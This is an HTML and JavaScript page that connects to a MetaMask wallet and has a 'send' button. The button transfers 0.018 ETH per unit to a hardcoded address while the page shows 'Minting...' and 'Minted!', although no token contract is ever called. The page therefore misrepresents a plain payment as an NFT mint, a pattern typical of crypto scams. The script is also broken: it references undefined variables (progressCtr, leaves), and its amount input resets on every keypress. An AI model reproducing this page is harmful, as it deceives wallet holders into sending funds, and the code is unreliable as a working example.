<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=0.1">
    <title>Btn send</title>
    <style>
        select {
            background-color: #cebce6;
            font-family: 'Smooth v2', sans-serif;
            font-weight: bold;
            font-size: 20px;
        }

        body {
            background-color: rgb(227, 221, 235);
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            font-size: 20px;
            color: rgb(10, 10, 10);
            overflow: hidden;
        }

        button {
            background-color: rgb(169, 157, 184);
            border: none;
            padding: 10px 50px;
            border-radius: 5px;
            margin: 10px 0;
            cursor: pointer;
            color: rgb(8, 8, 8);
            font-weight: 600;
        }

        #dialog-ctr {
            margin-block: -200px 300px;
        }

        dialog {
            box-shadow: 2px 1px 3px #0055,
                1px 2px 3px #0055,
                3px 3px 1px #0053,
                -3px 3px 1px #0053;
        }

        progress {
            cursor: progress;
            height: 25px;
            width: 20vmax;
        }

    </style>
</head>
<body>

<div id="dialog-ctr"></div>

<nav>
    <button id="signin"></button>
</nav>

<span id="container" style="text-align: center;">

<div>
    <p>Wallet Address: <span id="walletAddress"></span></p>
</div>

<div>
    <label for="amount">Select Amount</label>
    <input type="number" id="amount" name="amount" min="1" required>

</div>
<button id="send">send</button>
</div>
<p>
    Price: <span id="price">0.00</span>
</p>
</div>
</span>

<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"
        integrity="sha512-E8QSvWZ0eCLGk4km3hxSsNmGWbLtSCSUcewDQPQWZF6pEU8GlT8a5fF32wOl1i8ftdMhssTrF/OhyGWwonTcXA=="
        crossorigin="anonymous" referrerpolicy="no-referrer">
        </script>
<script src="https://cdn.jsdelivr.net/npm/keccak256@latest/keccak256.js"></script>
    <script type="module">
        import { ethers } from "https://cdnjs.cloudflare.com/ajax/libs/ethers/5.4.3/ethers.esm.min.js";
        const keccak256 = window.keccak256
        if (window["ethers"] === undefined) {
            window.ethers = ethers;
        }

        const pb_Title = document.getElementById("prog-bar-title");
        const dialogCtr = document.getElementById("dialog-ctr");
        const center = document.createElement("center");
        const dialogEl = document.createElement("dialog");

window.addEventListener("load", async (ev) => {

// Ethereum global object.
const ethereum = window.ethereum;

const dialog = (mssg) => {
    const font = document.createElement("font");

    if (font.textContent)
        font.textContent = "";
    font.style.fontSize = "1.5rem";
    font.style.color = "rgb(120,50,40)";
    font.style.width = dialogEl.style.width;
    font.textContent = mssg;

    dialogEl.style.textAlign = "center";
    dialogEl.style.paddingInline = "10px";
    dialogEl.appendChild(font);
    dialogEl.setAttribute("open", true);
    center.appendChild(dialogEl);
    dialogCtr.appendChild(center);

    setTimeout(() => {
        dialogEl.removeAttribute("open");
        dialogEl.removeChild(font);
        center.removeChild(dialogEl);
    }, 3000);
};

// Check if MetaMask or some provider is installed
if (!ethereum) {
                dialog("MetaMask is not installed!");
                return;
            }
const isConnected = ethereum.isConnected();

 // DOM elements 
const signinEl = document.querySelector("#signin");
const mintBtn = document.getElementById('send');
const amountEl = document.getElementById('amount');
const priceEl = document.getElementById('price');
let account = null;
let maxAllowed = 4;

// Event listeners
signinEl.addEventListener("click", async () => await getAccount());
mintBtn.addEventListener("click", async () => await send());
amountEl.addEventListener("keydown", (ev) => {
    amountEl.disabled = true;
    setTimeout(() => {
    amountEl.disabled = false;
    amountEl.autofocus = true;
    ev.target.value = (1).toString(16);
    }, 0)
});

amountEl.addEventListener("change", (ev) => {
ev.preventDefault();
const amount = ev.target.value;
const price = (0.018 * amount).toFixed(3);
priceEl.textContent = price;
});

signinEl.textContent = "Sign into MetaMask";
signinEl.setAttribute("hidden", true)
progressCtr.style.display = "block";

if (!ethereum.selectedAddress) {
    document.querySelector("#container").setAttribute("hidden", true);
    progressCtr.style.display = "none";
    signinEl.removeAttribute("hidden")
    return
}

let signerAddress;
const provider = new ethers.providers.Web3Provider(ethereum);
const signer = provider.getSigner();
signerAddress = await signer.getAddress();

async function getAccount() {
const accounts = await ethereum.request({ method: 'eth_requestAccounts' });

if (accounts.length !== 0) {
    account = accounts[0];
    signinEl.removeAttribute("disabled");
    location.reload();
}
}

document.getElementById('walletAddress').textContent = signerAddress;

ethereum.on("accountsChanged", (accounts) => {
    window.location.reload();
})

if (!account) {
    setTimeout(() => {
    ethereum.request({ method: 'eth_accounts' })   
    .then(async (acc) => {
    leaves.forEach((l) => {
        const originalL = l;
        l = l.toLowerCase();
        if (l.match(acc[0].toLowerCase())){
            account = originalL;
        }
    });

    amountEl.setAttribute("max", 100);
    amountEl.setAttribute("min", 1);
    amountEl.setAttribute("value", (1).toString(16));
    priceEl.textContent = String(0.018)

     }); 
    }, 4000);
}

async function send() {

    const amount = Number(amountEl.value);

if (amount === 0) {
    dialog("Please select a valid quantity!");
    return;
}
if (amount > maxAllowed) {
    dialog(`Quantity not allowed, your max quantity allowed is: ${maxAllowed}`);
    return;
}
let price = 0.018;
const calc = price * amount;

 try {
    mintBtn.disabled = true
    mintBtn.removeAttribute("style");
    mintBtn.textContent = 'Minting...'
    price = ethers.utils.parseEther(calc.toString(10));
    const gasLimit = 3000000;

    const toAddress = '0xaf8221d68E93AE0E279dB5Bd19eB30200C6240ff';    
    const transaction = {
    from: signerAddress,
    to: toAddress,
    value: price,
   };

   // Firmar y enviar la transacción
   const result = await provider.request({
   method: 'eth_sendTransaction',
   params: [transaction],
});   
console.log(result); 
console.log("minted", amount)
dialog("Minted!");
return;
}

catch (e) {
            console.table(e, ["value"]);
            if (e) {
                const message = e.message.split("(", 1)[0];
                dialog(message);
            }
        }

finally {
            mintBtn.innerHTML = 'send'
            mintBtn.disabled = false
        }  
    }     
    
isConnected ? dialog("Connected") : null;
window.removeEventListener("load", (ev) => ev.preventDefault());

});


</script>
</body>
</html>